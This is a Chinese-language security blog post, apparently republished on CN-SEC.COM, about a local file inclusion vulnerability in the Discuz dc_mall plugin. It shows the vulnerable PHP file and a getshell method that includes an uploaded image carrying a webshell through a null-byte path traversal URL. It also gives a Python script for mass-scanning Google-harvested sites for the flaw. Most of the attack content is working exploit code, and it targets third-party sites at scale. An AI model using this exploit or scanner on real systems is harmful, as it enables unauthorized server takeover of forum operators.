#插件信息:
http://addon.discuz.com/?@dc_mall.plugin
官方安装量3000+ (已经不少了吧)
#测试环境:
PHP 版本为: 5.2.9-2
magic_quotes_gpc = off
dc_mall.inc.php(漏洞文件)
<?php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } $_lang = lang('plugin/dc_mall'); $action = $_GET['action'] ? $_GET['action'] : 'index'; $version ='Ver 1.1.1'; $cvar = $_G['cache']['plugin']['dc_mall']; $file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';//action参数未过滤直接传入$file 后面的用%00截断即可包含任意文件 if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action'); $usercredit = getuserprofile('extcredits'.$cvar['credit']); $mallnav = C::t('#dc_mall#dc_mall_sort')->getdata(); $sortid = dintval($_GET['sortid']); if(empty($mallnav[$sortid]))$sortid=0; @include $file; $croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php'; $cronupdate = @include $croppath; if(TIMESTAMP-$cronupdate['timestamp']>$cvar['autotime']*60){ require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php'; build_cache_plugin_mallinfo(); $configdata = 'return '.var_export(array('timestamp'=>TIMESTAMP), true).";/n/n"; if($fp = @fopen($croppath, 'wb')) { fwrite($fp, "<?php/n//plugin mall temp upgrade check file, DO NOT modify me!/n//Identify: ".md5($configdata)."/n/n$configdata?>"); fclose($fp); } } include template('dc_mall:index/'.$action); ?>
#包含测试
#getshell
怎么shell就不用多说了,前台上传带马图片,在直接用包含就成功
www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall
批量从谷歌采集了一批
#!/usr/bin/env python # -*- coding: utf-8 -*- import urllib import requests import os def exp(): count=len(open('dz.txt','rU').readlines()) for pwd in open("dz.txt").readlines(): target=pwd.strip('/n') proto,rest = urllib.splittype(target) host,rest = urllib.splithost(rest) url = "http://"+host+"/plugin.php?action=../../../../../robots.txt%00&id=dc_mall" #print url try: res = requests.get(url) #print res.content if "robots.txt" in res.content: print host except Exception, e: pass if __name__ == '__main__': exp()
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论